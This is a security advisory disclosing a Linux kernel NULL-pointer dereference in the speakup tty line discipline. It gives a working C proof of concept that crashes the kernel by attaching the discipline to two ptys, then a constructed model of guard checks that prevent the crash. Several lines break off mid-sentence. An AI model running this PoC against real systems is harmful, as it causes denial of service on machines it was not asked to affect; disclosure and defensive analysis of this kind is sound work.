Date: Thu, 19 Nov 2020 10:46:59 +0800
From: Shisong Qin <>
Subject: Linux kernel NULL-ptr deref bug in spk_ttyio_ldisc_close


Recently we found a NULL-ptr deref BUG in spk_ttyio.c in the longterm 4.19
Linux kernel, and it could also be triggered in the 5.9 Linux kernel. In
function spk_ttyio_ldisc_close, it would free the "speakup_tty->disc_data"
and set "speakup_tty" to NULL. However, if we open two tty devices and use
tiocsetd() to set them as "speakup_tty" and close them in turn, the first
close would set "speakup_tty" to NULL, and the second close would try to
dereference the "speakup_tty", leading to a NULL-ptr deref crash.

This bug could be reproduced in the longterm 4.19 Linux kernel with
To reproduce it in the 5.9 Linux kernel, CONFIG_ACCESSIBILITY=y is also
required in config, and here is a simple poc:

#define _GNU_SOURCE

#include <dirent.h>
#include <endian.h>
#include <errno.h>
#include <fcntl.h>
#include <signal.h>
#include <stdarg.h>
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/ioctl.h>   /* ioctl() prototype; was missing from the listing */
#include <sys/prctl.h>
#include <sys/stat.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <time.h>
#include <unistd.h>

int main(void) {
    int disc = 0x1a;                        /* 26 == N_SPEAKUP line discipline */
    int fd = open("/dev/ptmx", O_RDWR, 0);  /* first pty */
    ioctl(fd, 0x5423, &disc);               /* 0x5423 == TIOCSETD: attach speakup ldisc */
    int fd2 = open("/dev/ptmx", O_RDWR, 0); /* second pty */
    ioctl(fd2, 0x5423, &disc);              /* attach the same ldisc a second time */
    return 0;                               /* process exit closes both fds in turn */
}

After the process returns, it seems the automatic call to release would
trigger the NULL-ptr deref bug.

Here is the commit to patch this BUG:

* 2020/11/10 - Vulnerability reported to
* 2020/11/11 - Vulnerability confirmed, and reported to
* 2020/11/19 - Vulnerability opened.

Shisong Qin and Bodong Zhao, Tsinghua University
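The defect described in the report is a single global (speakup_tty) shared by every tty the discipline is attached to, with the close path tearing that global down for whichever tty closes first. Below is an added, constructed user-space model of that lifecycle, not the reporter's PoC and not kernel code, that replays the report's sequence (attach to two ttys, close both) against a version carrying the two guards a reviewer would look for: refusing a second attach while one is active, and refusing a close for any tty that is not the one recorded in the global (which also covers the already-NULL case). The guard choice is my illustration of the defensive shape and is not a statement about what the upstream fix commit does; struct and function names are invented for the model.

```c
#include <errno.h>
#include <stddef.h>
#include <stdio.h>
#include <stdlib.h>

/* Constructed stand-in for the kernel's tty struct (model only). */
struct model_tty {
    int id;
    void *disc_data;
};

/* The driver keeps one global for the tty the discipline is attached to;
 * this is the shared state the two-close sequence in the report trips over. */
static struct model_tty *speakup_tty;

/* Attach: refuse a second tty while one is already attached (assumed guard). */
int model_ldisc_open(struct model_tty *tty)
{
    if (speakup_tty)
        return -EBUSY;
    tty->disc_data = calloc(1, 64);   /* stand-in for the per-attach allocation */
    if (!tty->disc_data)
        return -ENOMEM;
    speakup_tty = tty;
    return 0;
}

/* Detach: only the tty recorded in the global may tear it down. A NULL
 * global (already closed) or a different tty is rejected before any
 * dereference of speakup_tty happens (assumed guard). */
int model_ldisc_close(struct model_tty *tty)
{
    if (speakup_tty != tty)
        return -ENXIO;
    free(speakup_tty->disc_data);
    speakup_tty->disc_data = NULL;
    speakup_tty = NULL;
    return 0;
}

/* 1 while a tty is attached, 0 once torn down. */
int model_speakup_attached(void)
{
    return speakup_tty != NULL;
}

/* Replays the reporter's sequence: two ttys, attach the discipline to both,
 * then close both in turn. Returns how many closes reached the teardown
 * path; with the guards in place that is exactly one, and the second close
 * is rejected instead of dereferencing a NULL global. */
int replay_reporter_sequence(void)
{
    struct model_tty a = { 1, NULL }, b = { 2, NULL };
    int torn_down = 0;

    model_ldisc_open(&a);               /* 0: a is attached */
    model_ldisc_open(&b);               /* -EBUSY: a still attached */
    if (model_ldisc_close(&a) == 0)     /* tears down, global becomes NULL */
        torn_down++;
    if (model_ldisc_close(&b) == 0)     /* -ENXIO: global is NULL, no deref */
        torn_down++;
    return torn_down;
}

int main(void)
{
    printf("teardowns: %d, still attached: %d\n",
           replay_reporter_sequence(), model_speakup_attached());
    return 0;
}
```

Without the second guard, the model's close would reach `free(speakup_tty->disc_data)` with speakup_tty already NULL, which is the shape of the crash the report describes; the point of the comparison in model_ldisc_close is that the identity check on the global has to come before any field access, not after.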
